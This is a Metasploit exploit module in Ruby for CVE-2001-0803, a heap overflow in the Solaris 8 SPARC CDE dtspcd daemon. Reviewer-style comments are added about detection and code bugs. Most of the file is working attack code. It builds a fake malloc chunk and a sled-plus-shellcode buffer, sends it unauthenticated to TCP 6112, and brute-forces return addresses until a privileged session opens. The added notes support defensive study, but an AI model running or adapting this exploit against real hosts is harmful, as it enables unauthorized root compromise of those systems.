##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
# Exploit module for CVE-2001-0803 (OSVDB 4503, BID 3517, CERT CA-2001-31):
# a heap overflow in the Solaris CDE subprocess control daemon (dtspcd),
# ported from noir's exploit as published in the Shellcoder's Handbook.
# The single target is Solaris 8 on SPARC; the daemon listens on TCP 6112
# by default (see RPORT below).
#
# Defender's notes, all visible in the code below:
# * The overflow travels in an SPC "register" request that needs no prior
#   authentication (see #spc_register), so exposure of port 6112 to an
#   untrusted network is the risk boundary.
# * #exploit is a search over two unknown values, and every attempt opens
#   a new TCP connection carrying a ~4 KB request body, so an unsuccessful
#   run produces many short connections to the port -- a noisy pattern for
#   network monitoring.
# * #check only confirms that something answers the register handshake; it
#   does not compare the reported version, so "Detected" is not "Vulnerable".
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  # Supplies connect/disconnect/sock, used by the spc_* helpers.
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata, payload constraints and the Solaris 8 target,
  # then adds the RPORT option (default 6112).
  #
  # 'Rets' layout, as consumed by #exploit:
  #   [0] base address added to each candidate jump offset in [4]
  #   [1] first value tried for rbase
  #   [2] upper bound (exclusive) for rbase
  #   [3] step between rbase values
  #   [4] candidate jump offsets
  # What these addresses refer to on the target is not determined here;
  # the values are taken as-is from the original exploit.
  #
  # @param info [Hash] module info merged through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Solaris dtspcd Heap Overflow',
      'Description' => %q{
        This is a port of noir's dtspcd exploit. This module should
        work against any vulnerable version of Solaris 8 (sparc).
        The original exploit code was published in the book
        Shellcoder's Handbook.
      },
      'Author' => [ 'noir <noir[at]uberhax0r.net>', 'hdm' ],
      'License' => MSF_LICENSE,
      'Version' => '$Revision$',
      'References' =>
        [
          [ 'CVE', '2001-0803'],
          [ 'OSVDB', '4503'],
          [ 'BID', '3517'],
          [ 'URL', 'http://www.cert.org/advisories/CA-2001-31.html'],
          [ 'URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'],
        ],
      'Privileged' => true,
      'Payload' =>
        {
          # Encoded payload may be at most 800 bytes; NUL and CR are excluded
          # because the request is a NUL-delimited text protocol (see #spc_register).
          'Space' => 800,
          'BadChars' => "\x00\x0d",
          # Three copies of a 4-byte SPARC instruction placed before the
          # encoder stub -- presumably a no-op filler; verify with a disassembler.
          'PrependEncoder' => ("\xa4\x1c\x40\x11" * 3),
        },
      'Platform' => 'solaris',
      'Arch' => ARCH_SPARC,
      'Targets' =>
        [
          ['Solaris 8',
            { 'Rets' =>
              [0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] ]
            }
          ],
        ],
      'DisclosureDate' => 'Jul 10 2002',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(6112)
      ], self.class)
  end

  # Main entry point. Gives up immediately if the service does not complete
  # the register handshake. Otherwise, for each candidate jump offset in
  # Rets[4], walks rbase from Rets[1] up to (but excluding) Rets[2] in steps
  # of Rets[3], sending two attempts per step (rbase and rbase + 4). The
  # search stops as soon as a session has been created.
  def exploit
    return if not dtspcd_uname()

    target['Rets'][4].each do |tjmp|
      rbase = target['Rets'][1]

      while (rbase < target['Rets'][2]) do
        # A session from an earlier attempt (including the second attempt of
        # the previous step) ends the search for this offset.
        break if session_created?
        begin
          print_status(sprintf("Trying 0x%.8x 0x%.8x...", target['Rets'][0] + tjmp, rbase))
          attack(target['Rets'][0] + tjmp, rbase, payload.encoded)
          break if session_created?

          attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded)
          rbase += target['Rets'][3]
        rescue EOFError
          # NOTE(review): #attack already swallows EOFError, so this branch
          # looks unreachable from there; if it were hit, the increment above
          # would be skipped and the same rbase retried -- confirm.
        end
      end
    end

    handler
    disconnect
  end

  # Presence check only: Detected when the register handshake completes,
  # Safe otherwise. The OS/version string printed by #dtspcd_uname is not
  # compared against anything, so a patched host still reports Detected.
  #
  # @return [Exploit::CheckCode] Detected or Safe
  def check
    return Exploit::CheckCode::Detected if dtspcd_uname()
    return Exploit::CheckCode::Safe
  end

  # Performs the SPC register handshake and parses the daemon's reply.
  # The reply is expected as NUL-padded "host:os:version:arch".
  #
  # @return [Boolean] true when a host field was parsed, false otherwise
  # @raise [NoMethodError] NOTE(review): propagates from #spc_read if the
  #   server sends no header at all; not rescued here or in #check -- confirm
  #   whether #check should treat that as Safe.
  def dtspcd_uname
    spc_connect()
    # Command 4 with user "root" and a single NUL as the body.
    spc_write(spc_register('root', "\x00"), 4)
    # NUL padding is stripped before splitting; an empty reply yields no
    # fields, so host is nil.
    host, os, ver, arch = spc_read().gsub("\x00", '').split(':')

    return false if not host

    print_status("Detected dtspcd running #{os} v#{ver} on #{arch} hardware")
    # Command 2 with an empty body is sent before returning; its meaning in
    # the SPC protocol is not defined in this file.
    spc_write("", 2)
    return true
  end

  # Builds the fake malloc chunk appended to the overflow buffer by #attack.
  # Only two fields carry data: retadd (big-endian, at offset 4) and
  # retloc - 8 (big-endian, last word). The remaining bytes are marker
  # filler (0x12.., 0x23.., 0xff.., 0x34.., 0x45.., 0x56..) kept from the
  # original exploit. The allocator behaviour this layout relies on is
  # described in the referenced book, not here.
  #
  # @param retloc [Integer] location value; stored as retloc - 8
  # @param retadd [Integer] value stored in the second word
  # @return [String] 32 bytes of fake chunk data
  def chunk_create(retloc, retadd)
    "\x12\x12\x12\x12" +
    [retadd].pack('N')+
    "\x23\x23\x23\x23\xff\xff\xff\xff" +
    "\x34\x34\x34\x34\x45\x45\x45\x45" +
    "\x56\x56\x56\x56" +
    [retloc - 8].pack('N')
  end

  # Sends one overflow attempt on a fresh connection.
  #
  # Request body layout:
  #   * an 8-byte SPARC instruction pair repeated to fill 4096 - 8 bytes
  #     minus the payload length (presumably a sled; verify the encoding
  #     with a disassembler), followed by the encoded payload;
  #   * fixed words 0x103e, 0x14, a 0x12121212 / 0xffffffff marker pair and
  #     0xff4;
  #   * the fake chunk from #chunk_create;
  #   * "X" padding up to a total of 0x103e - 8 = 0x1036 bytes.
  # The body is wrapped in a register request (command 4). The handler is
  # invoked after sending so a resulting session is picked up before
  # returning. EOFError (daemon closed the socket, e.g. because it crashed)
  # is swallowed so the caller's search can continue.
  #
  # @param retloc [Integer] forwarded to #chunk_create
  # @param retadd [Integer] forwarded to #chunk_create
  # @param fcode [String] encoded payload; at most 'Space' (800) bytes
  def attack(retloc, retadd, fcode)
    spc_connect()

    begin
      # Integer division floors the repeat count, so the sled plus payload
      # is at most 4088 bytes; the padding below absorbs the remainder.
      buf = ("\xa4\x1c\x40\x11\x20\xbf\xff\xff" * ((4096 - 8 - fcode.length) / 8)) + fcode
      buf << "\x00\x00\x10\x3e\x00\x00\x00\x14"
      buf << "\x12\x12\x12\x12\xff\xff\xff\xff"
      buf << "\x00\x00\x0f\xf4"
      buf << chunk_create(retloc, retadd)
      buf << "X" * ((0x103e - 8) - buf.length)

      spc_write(spc_register("", buf), 4)

      handler

    rescue EOFError
    end
  end

  # Formats an SPC register request body: the literal "4 ", a NUL, the user
  # name, two NULs, the literal "10", a NUL and the caller-supplied buffer.
  #
  # @param user [String] user name field
  # @param buff [String] trailing data
  # @return [String] request body
  def spc_register(user='', buff='')
    "4 \x00#{user}\x00\x0010\x00#{buff}"
  end

  # Writes one SPC message: a fixed-width hex header
  # (channel = 2, cmd, body length, sequence number) followed by a space
  # and the body. The sequence number is pre-incremented on each call and
  # must have been initialised by #spc_connect first.
  #
  # @param buff [String] message body
  # @param cmd [Integer] command code placed in the header
  def spc_write(buff = '', cmd='')
    sock.put(sprintf("%08x%02x%04x%04x %s", 2, cmd, buff.length, (@spc_seq += 1), buff))
  end

  # Reads one SPC reply: a 20-byte header, then the body whose length is
  # taken from the header's hex length field.
  #
  # @return [String] message body, or '' if nothing followed the header
  def spc_read
    # Bytes: 0-9 = channel, 9-10 = cmd, 10-13 = mbl, 14-17 = seq
    # NOTE(review): get_once may return nil when no data arrives, which
    # makes the slice below raise NoMethodError -- confirm intended.
    head = sock.get_once(20)
    # NOTE(review): head[10, 13] is a (start, length) slice, so it runs past
    # the 4-character mbl field described above into seq; String#hex then
    # parses every leading hex digit, giving an oversized read length that
    # get_once happens to tolerate. head[10, 4] is presumably intended --
    # verify against the protocol before changing.
    sock.get_once( head[10, 13].hex ) || ''
  end

  # Opens a fresh connection (closing any previous one) and resets the SPC
  # sequence counter used by #spc_write.
  def spc_connect
    disconnect
    connect
    @spc_seq = 0
  end

end